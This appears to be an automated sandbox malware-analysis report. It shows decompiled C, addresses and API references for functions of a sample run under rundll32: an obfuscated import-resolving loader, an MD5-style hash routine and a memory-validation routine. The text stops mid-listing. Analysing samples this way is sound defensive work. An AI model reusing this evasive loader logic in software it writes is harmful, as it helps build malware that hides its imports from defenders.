Opcode ID: 102ce236176b549a1484aa23b8b0d4a06e4d791476afa87c9ec593d6a2c25211
Instruction ID: 740f7ac852a26ca891ddde8504c2c6e536540062a9b0e58a564806d0cc3295d2
Opcode Fuzzy Hash: 102ce236176b549a1484aa23b8b0d4a06e4d791476afa87c9ec593d6a2c25211
Instruction Fuzzy Hash: D1F08CB0645300ABEB209F68BE197563FA8A799712F04413AE741FE2F8D3B485818B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004015E3 Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015E3(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x4041c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x004015e3
0x004015ec
0x004015f1
0x004015f7
0x00401600
0x00401606
0x00401608
0x0040160b
0x00401610
0x00401617
0x00401617
0x0040161b
0x00401621
0x00401626
0x00000000
0x00000000
0x0040162c
0x00401636
0x00401638
0x0040163b
0x0040163e
0x00401642
0x0040164a
0x0040164c
0x0040164f
0x004016b7
0x004016b7
0x004016bb
0x00000000
0x00000000
0x00401654
0x0040165a
0x0040165c
0x0040166f
0x00401672
0x00401672
0x00401672
0x00401676
0x0040165e
0x0040165e
0x00401666
0x00401668
0x00000000
0x00000000
0x00000000
0x00000000
0x00401668
0x00401656
0x00401656
0x0040166a
0x0040166a
0x0040166a
0x00401679
0x0040167c
0x0040167e
0x00401685
0x00401680
0x00401680
0x00401680
0x0040168d
0x00401693
0x00401695
0x004016c5
0x00401697
0x00401697
0x0040169a
0x0040169c
0x004016a4
0x004016a4
0x004016a9
0x004016ab
0x004016b2
0x004016b4
0x004016b4
0x004016b4
0x00000000
0x004016b4
0x00000000
0x00401695
0x00401644
0x00401644
0x00401648
0x00000000
0x00000000
0x00401648
0x004016c8
0x004016c8
0x004016cf
0x004016d4
0x00000000
0x00000000
0x004016da
0x004016e5
0x00000000
0x004016e5
0x004016dc
0x004016dc
0x004016e2
0x00000000
0x004016e2
0x00401610
0x004016e6
0x004016eb

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,0040159A), ref: 0040161B
GetProcAddress.KERNEL32(?,00000000), ref: 0040168D

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 424bc5bbea111a8b14d5dcae703d52492c2e45c79eda0825660022e00faa5703
Instruction ID: b6ce0f3373bfba93720632a760a03fc5b28e1e0d61573c882b4019fd40126a1f
Opcode Fuzzy Hash: 424bc5bbea111a8b14d5dcae703d52492c2e45c79eda0825660022e00faa5703
Instruction Fuzzy Hash: 02314971A01206DBCB10CF95CC94AAEB7F9BF54304F18497AD801EB3A0E73ADA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 044B4BF1 Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E044B4BF1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x044b4bf4
0x044b4bff
0x044b4c02
0x044b4c05
0x044b4c06
0x044b4c24
0x044b4c26
0x044b4c29
0x044b4c2c
0x044b4c2c
0x044b4c2f
0x044b4c2f
0x044b4c32
0x044b4c32
0x044b4c35
0x044b4c35
0x044b4c52
0x044b4c55
0x044b4c6b
0x044b4c6e
0x044b4c88
0x044b4c8b
0x044b4ca1
0x044b4ca4
0x044b4ca6
0x044b4cbe
0x044b4cc1
0x044b4cc4
0x044b4cdc
0x044b4cdf
0x044b4cf9
0x044b4cfc
0x044b4d12
0x044b4d15
0x044b4d17
0x044b4d2f
0x044b4d34
0x044b4d37
0x044b4d4d
0x044b4d50
0x044b4d6a
0x044b4d6d
0x044b4d83
0x044b4d86
0x044b4d88
0x044b4da3
0x044b4da6
0x044b4dbd
0x044b4dc0
0x044b4dc4
0x044b4ddd
0x044b4de0
0x044b4de2
0x044b4de5
0x044b4e00
0x044b4e03
0x044b4e1c
0x044b4e1f
0x044b4e2f
0x044b4e32
0x044b4e4a
0x044b4e4d
0x044b4e67
0x044b4e6a
0x044b4e82
0x044b4e85
0x044b4e9b
0x044b4e9e
0x044b4eb6
0x044b4eb9
0x044b4ed1
0x044b4ed4
0x044b4eee
0x044b4ef1
0x044b4f07
0x044b4f0a
0x044b4f22
0x044b4f25
0x044b4f3f
0x044b4f42
0x044b4f5a
0x044b4f5d
0x044b4f73
0x044b4f76
0x044b4f8e
0x044b4f91
0x044b4fa9
0x044b4fac
0x044b4fbe
0x044b4fc1
0x044b4fd3
0x044b4fd6
0x044b4fe8
0x044b4feb
0x044b4fef
0x044b4fff
0x044b5002
0x044b5010
0x044b5013
0x044b5025
0x044b5028
0x044b503c
0x044b503f
0x044b5041
0x044b5051
0x044b5054
0x044b5066
0x044b5069
0x044b5077
0x044b507a
0x044b508c
0x044b508f
0x044b5093
0x044b50a3
0x044b50a6
0x044b50b8
0x044b50bb
0x044b50c9
0x044b50cc
0x044b50de
0x044b50e1
0x044b50f3
0x044b50f6
0x044b510a
0x044b510d
0x044b5121
0x044b5124
0x044b5138
0x044b513b
0x044b514f
0x044b5152
0x044b5166
0x044b5169
0x044b517d
0x044b5182
0x044b5194
0x044b5197
0x044b51ab
0x044b51ae
0x044b51c2
0x044b51c5
0x044b51db
0x044b51de
0x044b51f2
0x044b51f5
0x044b5207
0x044b520a
0x044b521e
0x044b5221
0x044b5235
0x044b5238
0x044b524c
0x044b5255
0x044b5258
0x044b5261
0x044b526a
0x044b5272
0x044b527a
0x044b5284
0x044b5299

APIs

memset.NTDLL ref: 044B528D

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
Instruction ID: 79fdb6602c0f6f743f9a6cd10bacc2fb5b6ad8b061c1c358426880cb0196feed
Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
Instruction Fuzzy Hash: 7022847BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 044B84C1 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B84C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x44ba380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x44ba3c8 = 1;
										__eflags =  *0x44ba3c8;
										if( *0x44ba3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x44ba380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x44ba3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x44ba380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x44ba388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x44ba384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x44ba3c8 = 1;
							__eflags =  *0x44ba3c8;
							if( *0x44ba3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x44ba3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x44ba388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x44ba380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x044b84cb
0x044b84ce
0x044b84d4
0x044b84f2
0x00000000
0x044b84f2
0x044b84dc
0x044b84e5
0x044b84eb
0x044b84fa
0x044b84fd
0x044b8500
0x044b850a
0x044b850a
0x044b850c
0x044b850f
0x044b8511
0x044b8511
0x044b8513
0x044b8516
0x00000000
0x00000000
0x044b8518
0x044b851a
0x044b8580
0x044b8580
0x044b86de
0x00000000
0x044b86de
0x044b851c
0x044b851c
0x044b8520
0x044b8522
0x044b8522
0x044b8522
0x044b8522
0x044b8525
0x044b8526
0x044b8529
0x044b8529
0x044b852d
0x044b8531
0x044b853f
0x044b853f
0x044b8547
0x044b854d
0x044b854f
0x044b8551
0x044b8561
